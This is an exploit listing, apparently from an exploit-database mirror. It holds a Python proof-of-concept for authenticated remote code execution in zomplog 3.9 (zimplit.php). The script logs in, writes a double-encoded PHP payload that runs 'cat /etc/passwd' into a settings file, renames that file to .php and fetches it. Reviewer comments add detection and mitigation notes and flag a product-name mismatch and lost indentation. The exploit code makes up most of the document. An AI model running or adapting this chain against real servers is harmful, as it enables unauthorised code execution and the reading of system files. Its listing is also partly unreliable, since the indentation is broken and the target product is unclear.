## https://sploitus.com/exploit?id=PACKETSTORM:173806
#Exploit Title: zomplog 3.9 - Remote Code Execution (RCE)  
#Application: zomplog   
#Version: v3.9  
#Bugs: RCE  
#Technology: PHP  
#Vendor URL: http://zomp.nl/zomplog/  
#Software Link: http://zomp.nl/zomplog/downloads/zomplog/zomplog3.9.zip  
#Date found: 22.07.2023  
#Author: Mirabbas Ağalarov  
#Tested on: Linux   
  
  
import requests  
  
#inputs  
# Credentials for an existing CMS account are read interactively. Every request
# below is sent from the logged-in session, so what this script demonstrates is
# a post-authentication issue.
username=input('username: ')  
password=input('password: ')  
  
#urls  
# All endpoints are the same script, zimplit.php, on a local test install; the
# `action` query parameter selects the operation (login, saveE, rename).
# NOTE(review): the header names "zomplog 3.9" but these paths are
# /zimplitcms/zimplit.php -- confirm which product is affected before mapping
# this to an advisory or writing a detection for it.
login_url="http://localhost/zimplitcms/zimplit.php?action=login"  
# saveE is addressed at Zsettings.js; presumably this file sits next to
# zimplit.php, since the renamed copy is later fetched from that directory.
payload_url="http://localhost/zimplitcms/zimplit.php?action=saveE&file=Zsettings.js"  
# The rename request changes the file's extension from .js to .php. In access
# logs, action=rename with a newname ending in a server-executed extension is
# the clearest indicator of this chain; refusing such extensions in newname on
# the server side is the corresponding mitigation.
rename_url="http://localhost/zimplitcms/zimplit.php?action=rename&oldname=Zsettings.js&newname=poc.php"  
# The renamed file is then requested directly.
poc_url="http://localhost/zimplitcms/poc.php"  
  
  
#login   
# A single Session is used so that whatever cookie the login response sets is
# replayed on the save, rename and fetch requests that follow.
session = requests.Session()  
# Form body for the login action: language, the two credentials, and the
# submit button value.
login_data=f"lang=en&username={username}&password={password}&submit=Start!"  
# Fixed request headers: a language cookie, the form content type and a static
# desktop-browser User-Agent string.
headers={  
'Cookie' : 'ZsessionLang=en',  
'Content-Type' : 'application/x-www-form-urlencoded',  
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'  
}  
login_req=session.post(login_url,headers=headers,data=login_data)  
  
# Login success is judged by the HTTP status code alone; the response body is
# not inspected.
# NOTE(review): the branch bodies below appear at column 0 on this page; their
# indentation was lost when the listing was extracted.
if login_req.status_code == 200:  
print('Login OK')  
else:  
print('Login promlem.')  
exit()  
#payload  
# The body is one form field, `html`, whose value is percent-encoded twice.
# Fully decoded it is the text of the settings file: four assignments
# (ZmaxpicZoomW, ZmaxpicZoomH, ZmaxpicW, ZmaxpicH) with a PHP open tag placed
# inside the first value. The PHP statement only prints /etc/passwd, i.e. it is
# a proof marker that code ran, not a persistent backdoor.
# Defender note: the content is inert while the file is named *.js; the issue
# is that the save action appears to store it without rejecting PHP tags, and
# the rename action later makes it executable. NOTE(review): server-side
# handling is not visible here -- confirm against the application source.
payload_data="html=ZmaxpicZoomW%2520%253D%2520%2522%2522%253C%253Fphp%2520echo%2520system('cat%2520%252Fetc%252Fpasswd')%253B%253F%253E%2522%253B%2520%250AZmaxpicZoomH%2520%253D%2520%2522150%2522%253B%2520%250AZmaxpicW%2520%253D%2520%2522800%2522%253B%2520%250AZmaxpicH%2520%253D%2520%2522800%2522%253B%2520"  
# Same content type and User-Agent as the login request, without the explicit
# Cookie header (the Session supplies cookies).
pheaders={  
'Content-Type' : 'application/x-www-form-urlencoded',  
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36'  
}  
# The response to the save request is stored but never checked.
payload_req=session.post(payload_url,headers=pheaders,data=payload_data)  
  
#rename  
# The rename is issued as a plain GET whose only parameters are action, oldname
# and newname. NOTE(review): no anti-CSRF token is sent with this
# state-changing request, which suggests the action may also be reachable
# cross-site from an authenticated browser -- confirm against the application.
  
rename_req=session.get(rename_url)  
  
#poc  
# Fetches the renamed file and prints the response body. Command output in the
# body means the web server executed a file that the CMS allowed to be renamed
# to .php; serving that directory without PHP execution would stop the chain at
# this step.
poc_req=session.get(poc_url)  
print(poc_req.text)  
  
  
#youtube poc video - https://youtu.be/nn7hieGyCFs